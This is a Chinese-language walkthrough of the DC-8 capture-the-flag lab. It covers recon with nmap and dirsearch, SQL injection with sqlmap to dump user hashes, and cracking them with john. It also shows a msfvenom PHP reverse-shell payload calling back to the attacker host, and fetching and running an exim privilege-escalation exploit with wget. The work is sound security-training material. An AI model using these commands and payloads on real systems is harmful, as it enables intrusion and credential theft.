【DC8靶场通关详细记录】

环境搭建

  1. DC8主机靶场,点击下载
  2. 导入下载文件,如果报错点击重试
  3. 更改kali和DC8靶场的网络配置为统一的连接模式
  4. 靶场官网提示:需要提升到root权限查看唯一的flag

信息收集

扫描确定IP

使用arp-scan扫描网络,确定靶机IP,使用以下命令

  arp-scan -l

image.png

扫描端口以及服务

使用nmap对靶机进行扫描,确定开启的端口,以及端口对应的服务,使用以下命令

nmap -sV -p- -A 192.168.223.131

image.png

指纹识别

尝试访问靶机开放的端口80,是一个网站,可以尝试对靶机进行指纹识别,使用以下命令

 whatweb -v  192.168.223.131

image.png

目录爆破

靶机上搭建了一个网站,尝试进行目录爆破,使用一下命令

dirsearch -u 192.168.223.131

image.png
image.png

查找漏洞

访问页面

  1. 进行目录访问,尝试页面点击,观察url变化

image.png
image.png

  1. 页面点击后url发生变化出现数字的变化,可以尝试sql注入
  2. 继续访问其他目录

数据库注入

  1. 数据库注入成功,显示该注入类型为:布尔盲注、时间盲注、显错注入、联合注入

image.png

  1. 爆破数据库
 sqlmap -u "http://192.168.223.131/?nid=1"  --dbs

image.png

  1. 爆破数据库表
sqlmap -u "http://192.168.223.131/?nid=1"  -D d7db --tables

image.png

  1. 爆破数据表中的列
sqlmap -u "http://192.168.223.131/?nid=1"  -D d7db -T users  --columns

image.png

  1. 查看用户名密码
sqlmap -u "http://192.168.223.131/?nid=1"  -D d7db -T users -C name,pass --dump

image.png

使用john解密登录

  1. 使用john解密

image.png

  1. 两个用户尝试登录,john用户登录成功

尝试写入php反弹shell获取shell

  1. 使用msf生成反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.223.129 lport=8888 -f raw -o 1.php
  1. 在网站内部找php代码写入点

image.png
image.png

  1. 将生成的反弹shell复制进去之后保存,等待shell不成功
  2. 再次复制反弹shell进去,填写view内容提交然后获取到shell

image.png

提权

  1. 尝试提权
sudo -l
uname -a
find / -perm -u=s -type f 2>/dev/null
  1. 通过搜索漏洞,看到了与find查找内容相似的漏洞脚本
searchsploit 4.9.0

image.png

  1. 确定要使用的而提权脚本
searchsploit exim

image.png

  1. 在kali开启http服务
python -m http.server

image.png

  1. 通过shell尝试查看使用的版本
exim4 --version

image.png

  1. 在有权限的目录下上传提取脚本
cd tmp
wget http://192.168.223.129:8000/46996.sh
ls -l
chmod 777 46.996.sh
./46996.sh

image.png

  1. 执行脚本未成功提权
whoami

image.png

  1. 查看脚本内容,再次使用其中的方式提权
./raptor_exim_wiz -m netcat
./exim4 -m netcat
./46996.sh -m netcat

image.png

  1. 脚本执行成功,提升权限为root
id
whoami
cd root
ls
cat flag.txt

image.png

总结

  1. 使用sqlmap进行sql注入
  2. msfvenom生成木马
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.223.129 lport=8888 -f raw -o 1.php
  1. 漏洞利用脚本的使用,根据脚本内的提示方法进行使用
  • 31
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榕小树

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值